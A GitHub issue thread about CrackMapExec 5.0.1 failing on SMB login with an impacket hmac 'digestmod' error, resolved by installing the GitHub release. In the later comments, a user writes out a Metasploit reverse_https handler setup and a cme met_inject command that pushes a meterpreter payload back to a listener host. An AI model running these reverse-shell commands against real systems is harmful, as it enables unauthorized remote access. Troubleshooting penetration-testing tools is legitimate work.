cme 5.0.1 impacket modules fails

n0bl1nk commented 4 years ago

DESCRIPTION: cme 5.0.1 impacket modules errors.

COMMAND: crackmapexec smb 192.168.211.10 -u admin -p 'admin'

OUTPUT:

g:True) (SMBv1:False)
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 74, in proto_flow
    self.login()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 215, in login
    if self.plaintext_login(self.domain, user, password): return True
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 250, in plaintext_login
    self.conn.login(username, password, domain)
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 267, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 778, in login
    type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 631, in getNTLMSSPType3
    ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'],
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 39, in computeResponse
    return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 902, in computeResponseNTLMv2
    responseKeyNT = NTOWFv2(user, password, domain, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 891, in NTOWFv2
    return hmac_md5(theHash, user.upper().encode('utf-16le') + domain.encode('utf-16le'))
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 882, in hmac_md5
    h = hmac.new(key)
  File "/usr/lib/python3.8/hmac.py", line 153, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.8/hmac.py", line 51, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.
2020-04-29T00:44:05Z <Greenlet at 0x7f1511cbb370: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f1511d0b1f0>, '192.168.211.10')> failed with TypeError

blshkv commented 4 years ago

can't confirm it:

bash$ python-test-env/bin/crackmapexec smb 10.0.0.110 -u admin -p 'admin'
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [*] Windows 10.0 Build 18362 x64 (name:LAPTOP-HRJ9REOB) (domain:LAPTOP-HRJ9REOB) (signing:False) (SMBv1:False)
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [-] LAPTOP-HRJ9REOB\admin:admin STATUS_LOGON_FAILURE 
(python-test-env)

n0bl1nk commented 4 years ago

5.0.1 Version issu22

n0bl1nk commented 4 years ago

I was using 4.0.1 version, but I installed 5.0.1 version because I can't get reverse shell with "met_inject" and "empire_exec" in 4.0.1 version.

Authentication is successful in 4.0.1 version issu33

blshkv commented 4 years ago

Try to test it in Pentoo ;-) Just kidding. I have tested with valid credentials, still can't confirm it. Please install it in a virtualenv and test in a "clean" env

n0bl1nk commented 4 years ago

Do you have any idea why I can't get reverse shell in 4.0.1 version? I succeed using psexec on metasploit.

set payload windows/meterpreter/reverse_https
set LHOST 192.168.211.136
set LPORT 4444

cme smb 192.168.211.10 -u Administrator -p 'Password' -M met_inject -o LHOST=192.168.211.136 LPORT=4444

issu55

but i can't get a session

if i set windows/meterpeter/reverse_tcp triggers but session dies.

blshkv commented 4 years ago

4.0.1 was never officially released, so I have no idea where it came from. Anyway, it were a lot of changes recently, so you should really use the latest.

n0bl1nk commented 4 years ago

Okey thank you :)

samuelkneppel commented 4 years ago

FWIW, I am also receiving the same error on the same version on my Kali install. I also tried using a venv and received the same error within.

mpgn commented 4 years ago

Unfortunately I cannot reproduce this. Please include more details, did you compile the binary yourself ? did you take it from the release version ?

n0bl1nk commented 4 years ago

setup: apt-get install crackmapexec

error when I run the command: issu77

kali version: issu66

mpgn commented 4 years ago

Thanks @n0bl1nk can you test using this release ?

https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev

n0bl1nk commented 4 years ago

I am installing a new Kali, I will re-install and report on it.

Cryo2 commented 4 years ago

Hello, same issue with the latest kali release.

I have this error message only for (Pwn3d!) user.

I will try with the new release.

mpgn commented 4 years ago

Ok, please use the latest version from github, not the one from apt, we cannot change code on the apt version ;)

Cryo2 commented 4 years ago

Working, thank you :)

mpgn commented 4 years ago

Waiting for @n0bl1nk and closing if working

n0bl1nk commented 4 years ago

https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev is working

But still can't get a reverse-shell met_inject and empire_exec why? There is a section in my blog post that I mentioned about cme and I want to solve it.

empire_exec issu10000